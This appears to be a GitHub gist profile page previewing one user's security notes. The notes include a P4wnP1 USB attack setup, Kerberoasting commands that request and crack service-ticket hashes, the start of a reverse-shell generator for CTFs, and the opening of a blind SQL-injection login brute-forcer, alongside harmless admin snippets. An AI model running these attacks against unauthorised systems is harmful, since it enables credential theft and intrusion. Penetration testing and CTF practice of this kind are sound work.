Skip to content

Instantly share code, notes, and snippets.

View AvasDream's full-sized avatar
🎯
Focusing

AvasDream

🎯
Focusing
131 followers · 161 following
View GitHub Profile
@AvasDream
AvasDream / p4wnpi.md
Last active September 24, 2018 15:16
P4wnPi Setup

Project

P4wnP1 is a highly customizable USB attack platform, based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor). Link to Repository

Intsallation

Copy image to sd card

dd if=<Source> of=<destination> bs=512 status=progress
@AvasDream
AvasDream / privesc.md
Last active October 8, 2018 13:35
Ressources for privilege escalation.

Windows Kerber roasting

Only possible with valid credentials and kerberos.

GetUserSPNs.py -request -dc-ip IP DOMAIN/USER

Retreive Hash with impacket.

hashcat -m 13100 --force -a 0 keberos_hash /usr/share/wordlists/rockyou.txt

@AvasDream
AvasDream / String-manipulation.md
Last active October 14, 2018 12:53
My personal cheatsheet for String manipulation in Linux

From upper to lowercase

cat string | tr '[:upper:]' '[:lower:]

Cut spaces from string

tr -d ' '

@AvasDream
AvasDream / revshell.md
Last active May 29, 2019 15:08
Bash Function to create a reverseshell from tun0 interface. Might come in handy in CTFs or HackTheBox.
  • Create msf rc file for standard msfvenom binaries
function revshell() {
# $1 language
# Default tun0 1337

INF=tun0
PORT=1337
@AvasDream
AvasDream / zabbix.sh
Last active November 23, 2019 09:08
Easy install script for Zabbix 4.0 on Ubuntu 16.04 Server, works also with Ubuntu 18.04 but needs ppa of 16.04 in sources.list
#!/bin/bash
version=4.0.2
echo "execute with sudo privileges"
sudo true
echo "Install GCC"
sudo apt install gcc -y > /dev/null
echo "Install make"
sudo apt install make -y > /dev/null
echo "install postgresql server"
@AvasDream
AvasDream / snippets.md
Last active March 14, 2019 18:16
Python Hacking Snippets

Blind boolean based union sql injection bruteforcing

# !/usr/bin/python3
import requests
import timeit

start = timeit.default_timer()
URL = "http://35.227.24.107:5001/b3838cbb72/login"
QUERY = "admin' union select password from admins where id=1 and password like \""
@AvasDream
AvasDream / bbcheatsheet.md
Last active October 12, 2019 14:24
Bug Bounty Cheatsheet

Reconnaissance

DNS Recon

DNS Record Types:

A (Host address)
AAAA (IPv6 host address)
ALIAS (Auto resolved alias)
@AvasDream
AvasDream / log-analysis.md
Last active August 31, 2023 07:36
Monitor your ssh login attempts with Fail2ban and make a graph with python and the shodan api.

Analyse SSH Logins

We are looking at the auth.log file in /var/log/auth.log.

All the login attempts were captured in a time frame of ~3 Hours.

Get all Ips from logfile.

sudo cat /var/log/auth.log | grep "Failed password" | awk -F 'from' '{print $2}' | cut -d" " -f2 &gt; failed-login-ips.txt
@AvasDream
AvasDream / sss.md
Last active November 23, 2019 09:05
python scripts for
@AvasDream
AvasDream / win-privacy.md
Last active June 15, 2019 12:06
Windows 10 Privacy

DNS

Set Encrypted DNS Server

netsh interface ip add dns name="Ethernet" addr=1.1.1.1 index=1

netsh interface ip add dns name="Ethernet" addr=208.67.222.123 index=2